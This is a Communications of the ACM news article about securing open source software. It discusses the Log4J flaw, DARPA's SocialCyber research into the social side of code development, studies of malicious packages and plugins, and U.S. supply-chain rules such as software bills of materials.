News
Computing Applications News

Locking Down Secure Open Source Software

Can even secure open source software ever be considered truly safe?
Posted
  1. Introduction
  2. Examining the Social Aspect
  3. Misplaced Trust
  4. Author
html open and close tags on a lock, illustration

Panic rippled through the cybersecurity world in early December 2021 as word spread about a newly discovered vulnerability in a piece of open source software used by millions. A string of code called Log4J, which instructs programs written in Java to create a record of program activity, would allow attackers to insert malicious code into programs. The flaw led to risks in software used by government agencies, Web service providers such as Amazon Web Services and Apple iCloud, and even video games such as Minecraft.

In fact, within days of the first announcement, attackers used the flaw to get into the computer of the Suffolk County, NY, clerk’s office. Over the next few months, they stole files and passwords, installed malware and crypto-currency mining software, and gained access to other county networks, including the health and sheriff’s departments. In September, they encrypted files and demanded $2.5 million in ransom. The county refused to pay and was forced to switch to paper in providing services, and has since spent at least $5.2 million on investigation and repairs.

The Log4J issue earned a rare rating of 10 on the Common Vulnerability Scoring System, signaling the highest level of risk, and cybersecurity experts warned the effects could be felt for years until every affected program can be secured. It focused attention on the need to ensure the safety of open source software, which exists in most of the devices and applications used by individuals, corporations, governments, and utilities.

It also showed the need to develop new ways to hunt for vulnerabilities. The Log4J flaw was not the sort of code that would be readily apparent to mal-ware scanners or any of the other tools programmers use to check that their software is safe. “That code that was the source of that has gone through so many static analysis tools by so many different organizations over so much time and it was never caught,” says Scott Hissam, principal engineer at the Software Engineering Institute at Carnegie Mellon University. “Nobody noticed it. It’s because it was an architectural design decision that was not necessarily comprehended as a pattern.”

That kind of flaw, where the issue is not bad code but a deliberate decision to include a feature that someone later finds a way to exploit, is a difficult one to spot, says Aaron Reffett, senior engineer at the institute. “That’s a big blind spot,” he says. “It’s a difficult problem to take the code up to a level where you might be able to do more abstract analysis on it to answer some of those questions of ‘does the software only do what it’s supposed to do?'” One key issue is trying to identify just what it is the code is intended to do. “The code does what the code does. It doesn’t tell you what it’s supposed to do.”

There are efforts in academia to develop some kind of formal verification method to analyze such architectural issues, Reffett says, but so far they have not reached the point of creating commercially available architectural testing tools to scan software. In a healthy open-source project, decisions to add features should be subject to a robust discussion among programmers about why they are needed and whether they might lead to problems, but how would scanning software verify that? “That’s a tough one to measure because you’re not going to find that in your code base,” Reffett says. “You’re going to find that on message boards or Slack channels or mailing lists.”

Back to Top

Examining the Social Aspect

A desire to go beyond scanning code for evidence of security and robustness has led the U.S. Defense Advanced Research Projects Agency (DARPA) to launch a project it calls Social Cyber, Hybrid AI to Protect Integrity of Open-Source Code. The idea, says Sergey Bratus, program manager of the project, is to see whether artificial intelligence (AI) can analyze not only the code in software, but also all the human factors that go into writing that code. The 18-month project, called “an exploration” by the agency, does not aim to come up with specific solutions to vulnerabilities. Rather, it is trying to create a knowledge base that will let other researchers develop those solutions.

AI, of course, excels at spotting patterns, such as those that exist in strings of software code, which can make vulnerabilities in that code more apparent. “Similarly, our social processes have patterns and those patterns are also known to have weaknesses. Say when a particular subsystem is not really maintained cohesively, you can see that,” Bratus says. “It’s these patterns and the science of what those patterns might be that’s the key scientific content of SocialCyber.”

In one instance unrelated to the DARPA project, German researchers examined how patterns of human behavior could expose vulnerabilities to attackers. In their 2020 paper, “The Sound of Silence,” the researchers used data mining techniques to track patches for the Linux kernel, a key component of much software, that were sent out over the course of several months. Routine patches were discussed openly in places such as public mailing lists before being sent out. Critical updates for security issues, on the other hand, were discussed in secret channels to prevent malicious actors from learning about the vulnerabilities too soon, and then were sent out with little advance notice. The researchers, from Germany’s University of Applied Sciences Regensburg, the University of Hanover, BMW, and Siemens, found the very silence that was meant to downplay the significance of the patches actually identified them as important. Bad actors could use similar techniques to identify critical patches and exploit the flaw they were meant to fix in software that users had not yet updated.

In a project supported by Social-Cyber, James Blythe, a senior research computer scientist at the University of Southern California’s Information Sciences Institute, used agent-based modeling to see if he could assess the behavior of a set of software developers, reviewers, and maintainers over a 12-month period and use that model to predict what might happen in the next six months. For instance, he measured trends in bug reports and requests to review patches and tried to predict how the workload for dealing with those would evolve. A heavy workload could lead to a heavy cognitive load that might cause people to miss vulnerabilities or to bring in less-experienced developers who might deliberately or inadvertently introduce problems. A security analyst who spotted such an increase in workload might look more closely at the work, or might double-check patches coming from a new person to make sure they were legitimate.

“Our understanding of the interactions of the social processes and the ways to best avoid errors in the future is still really just developing at this point,” Blythe says. “I think we began to create a better understanding of what the process of creating software looks like.”

Back to Top

Misplaced Trust

Another way social processes interact with code dangerously is when attackers take advantage of the trust people place in package repositories where they can find bits of code for building their own programs, such as the Python Packing Index, RubyGems, or NPM for JavaScript. Brendan Saltaformaggio, an assistant professor in the School of Cybersecurity and Privacy at the Georgia Institute of Technology who is participating in SocialCyber, built an automated pipeline analysis program to examine the packages being uploaded to the repositories. In the million-plus packages he and his colleagues examined, they found 339 containing malicious code, which programmers would unknowingly incorporate into their own code. “Some of them go all the way up to thousands of downloads being included in other packages. It was a really complex ecosystem to pull apart,” Saltaformaggio says.

They also found WordPress plugins, used to enhance websites, are a major source of malicious code. Whole marketplaces exist to sell tainted plugins, and they use search engine optimization techniques to rank high in Google searches so people will be more likely to purchase them. The challenge with work like his, Saltaformaggio says, is that malware remains a moving target. “We know how to find malicious code, and we know how to find bugs in software. The problem is that as soon as we get good at looking in one place for them, malware authors shift.”

Since Log4J, the federal government has put in place requirements designed to make sure the supply chain that produces the software government agencies use is secure. A memo put out by the Office of Management and Budget in September requires software providers to attest that they have met a set of standards created by the National Institute of Standards and Technology, and to provide a software bill of materials (SBOM), an inventory of all the pieces that went into building a software package. Legislation proposed both by the U.S. Congress and the European Union would require similar approaches.

For open source software, an SBOM might be redundant, Hissam says, because the programming languages used to write it already list the software dependencies on which they rely. And Reffett says rather than simply attesting to the quality of their code, developers ought to provide evidence they are using good development practices that others can then assess. “What stops someone from just self-attesting to rainbows and unicorns? Not much,” he says.

It is unlikely anyone could ever say that code is completely safe, he says. What would be useful would be to provide quantifiable evidence that good software development practices were being followed, which could allow people to assign a risk score. Part of those practices would include trying to assess the complex web of dependencies in code, something SocialCyber also is attempting to tackle.

The challenge of finding and fixing vulnerabilities in programs is one that will continue, and it is not limited to one area, says Hissam. “This isn’t an ‘open source software’ problem,” he says. “It’s just a software problem.”

*  Further Reading

USENIX Security ’22 – Mistrust Plugins You Must: A Large-Scale Study Of Malicious Plugins
https://www.youtube.com/watch?v=16FmkoX_ZMY

Ramsauer, R., Bulwahn, L., Lohmann, D., and Mauerer, W.
The Sound of Silence: Mining Security Vulnerabilities from Secret Integration Channels in Open-Source Projects, ACM Cloud Computing Security Workshop, 2020
https://dl.acm.org/doi/10.1145/3411495.3421360

Hissam, S.
Taking Up the Challenge of Open Source Software Security in the DoD, Carnegie Mellon University’s Software Engineering Institute Blog
https://bit.ly/3WO4CKS

Duan, R., Alrawi, O., Kasturi, R.P., Elder, R., Saltaformaggio, B., and Lee, W.
Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages, NDSS Symposium, 2021
https://doi.org/10.48550/arXiv.2002.01139

U.S. National Institute of Standards and Technology Software Supply Chain Security Guidance
https://bit.ly/3jXMdMU

Join the Discussion (0)

Become a Member or Sign In to Post a Comment

The Latest from CACM

Shape the Future of Computing

ACM encourages its members to take a direct hand in shaping the future of the association. There are more ways than ever to get involved.

Get Involved

Communications of the ACM (CACM) is now a fully Open Access publication.

By opening CACM to the world, we hope to increase engagement among the broader computer science community and encourage non-members to discover the rich resources ACM has to offer.

Learn More